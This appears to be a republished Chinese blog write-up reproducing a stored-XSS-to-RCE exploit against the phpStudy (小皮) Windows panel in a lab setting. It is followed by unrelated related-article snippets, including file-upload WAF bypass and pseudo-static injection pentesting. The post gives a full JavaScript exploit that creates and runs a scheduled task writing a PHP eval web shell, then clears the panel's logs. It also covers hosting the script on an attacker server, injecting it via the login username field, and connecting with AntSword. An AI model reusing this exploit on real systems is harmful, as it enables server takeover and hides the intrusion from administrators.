phpStudy 小皮 Windows面板 存在RCE漏洞

news/2024/9/20 2:43:01/文章来源:https://www.cnblogs.com/xiaoyus/p/18418587

靶场资料后台自行领取【靶场】

image-20240726092307252

Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。

image-20240724122800032

image-20240724122752623

这是登录成功的界面

image-20240724094910957

登录成功了就来和大佬们喝喝茶吧~

15d9c38a7ea8e523e6ea58bd45aa0aa

首先在用户名登录的地方输入XSS代码验证是否存在漏洞

image-20240724101005780

即使输入失败也没有关系

image-20240724101014012

此时再输入正确的密码,成功弹窗

image-20240724101115119

如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。

image-20240724150712294

外链js的exp

function poc(){$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();data.task_id="9";data.title="xxxasdxxxx";data.exec_cycle="1";data.week="1";data.day="4";data.hour="15";data.minute = "42";data.shell='echo "<?php @eval($_POST[123]);?>" > E:/Development/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

在本地(攻击机)使用python开启一个http服务,并且将poc脚本放在服务目录下进行利用。

image-20240724095732542

打开攻击机浏览器看看能不能访问这个poc文件

image-20240724095751467

登录这个靶机,注入payload,链接脚本到你的exp

image-20240724100754732

这里我们返回就发现新增了一个计划脚本

image-20240724101438988

我们查看网站的根目录,此时已经多了一个php文件

image-20240724095913169

我们复制查看这个网站的绝对路径

image-20240724102205632

修改我们的exp,否则会路径找不到此php一句话木马文件,从而不能执行php文件

image-20240724102250983

我们尝试访问这个站点去执行这个exp,却不能访问

image-20240724124253854

我们进入后台打开nginx/阿帕奇服务器就好了

image-20240724102644633

此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用蚁剑连接不上了

image-20240724124441834

这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。

image-20240724103129412

这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)

image-20240724103147841

喝茶~

15d9c38a7ea8e523e6ea58bd45aa0aa

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/799368.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

伪静态注入的总结

伪静态页面渗透 在日常的测试中,经常会遇到静态页面,尤其是政府类的站点(前提经过授权),此时就会非常的棘手,在下多试验后,发现以下思路或可以帮助我们跨越这个障碍。 伪静态即是网站本身是动态网页如.php、.asp、.aspx等格式动态网页有时这类动态网页还跟“?”加参数来…

文件上传10种waf绕过姿势

基础篇:https://mp.weixin.qq.com/s/od0djMG4iwO755N2YgDAHg 环境搭建 首先去官网下载安全狗,进行网站配置,或者后台回复【安全狗】,靶场源码和waf软件都准备好了,都是最新版本的,直接下载就行安全狗配置文件防护规则这里用upload-labs中的第六关进行文件上传测试第六关是…

什么是域?如何搭建?

域 域是计算机网络中的一个逻辑组织单元,具有安全边界,实现资源的集中管理和共享。它通常分为,单域 ,多域,父域,子域 ,域树(tree), 域森林(forest),DNS域名服务器。 单域和多域 单域指网络中所有计算机和用户隶属于同一域,便于集中管理;多域则将网络划分为多个独…

css布局之Grid布局

前言 最近了解到一种新的布局:grid布局(网格布局),grid并不是最近才看到的,以前在设置display的时候,会在属性值列表中看到,但却没有给过太多关注。一次偶然机会听到:对于九宫格布局的实现,grid布局会比flex布局实现起来更方便,作为flex深度使用者,这句话无疑引起了…

windows安装OpenSSL定义OPENSSL_MODULES

一、安装方式一: 1.1 下载和安装下载其他人做的便捷版安装包http://slproweb.com/products/Win32OpenSSL.html 1.2 配置环境变量:OPENSSL_HOME 1.3 配置环境变量:OPENSSL_MODULES

Ros2 - Moveit2 - 使用 Bullet 进行碰撞检查

除了灵活碰撞库 (FCL) 之外,Bullet 碰撞检测也可用作碰撞检查器。本教程以可视化碰撞教程为基础,展示碰撞。 此外,还提供连续碰撞检测(CCD),并通过 Bullet 进行演示。 入门 如果您还没有这样做,请确保您已经完成入门指南中的步骤。 运行代码 使用 Roslaunch 启动文件直接…

广播数据包报文格式

BLE报文由不同的域组成,如果域的长度超过一个字节,就涉及到先传输字节的低位还是高位的问题,这里分字节序和比特序: 字节序:大多数的多字节域都是从低字节开始传输。但是,并不是所有的多字节域都是从低字节开始传输。 比特序:各个字节传输时,每个字节都是从低位开始。前…

Java 23连夜官宣发布,IDEA亲测可用!

0 前言 官宣发布:IDEA已支持下载:1 JEPs JEP 455 Primitive Types in Patterns, instanceof, and switch (Preview) 通过允许在所有模式上下文中使用原始类型模式,增强了模式匹配,并扩展了 instanceof 和 switch 以适用于所有原始类型。这是一项预览语言特性。 JEP 466 C…

ubuntu编译grpc protobuf

参考:Ubuntu系统中本地编译并安装grpc的C++版本及测试 - 知乎 (zhihu.com) 安装依赖:# 这些可能都已经安装了 sudo apt-get install pkg-config autoconf automake libtool make g++ unzip # 下面的可能没安装 sudo apt-get install libgflags-dev libgtest-dev sudo apt-ge…

python-逻辑运算符对应的函数

__eq__(self, other):用于 == 操作符__ne__(self, other):用于 != 操作符__lt__(self, other):用于 < 操作符__le__(self, other):用于 <= 操作符__gt__(self, other):用于 > 操作符__ge__(self, other):用于 >= 操作符

python-算数运算符对应的函数

__add__(self, other): 用于 + 操作符__sub__(self, other): 用于 - 操作符__mul__(self, other): 用于 * 操作符__truediv__(self, other): 用于 / 操作符__floordiv__(self, other):用于 // 操作符__mod__(self, other): 用于 % 操作符__pow__(sel…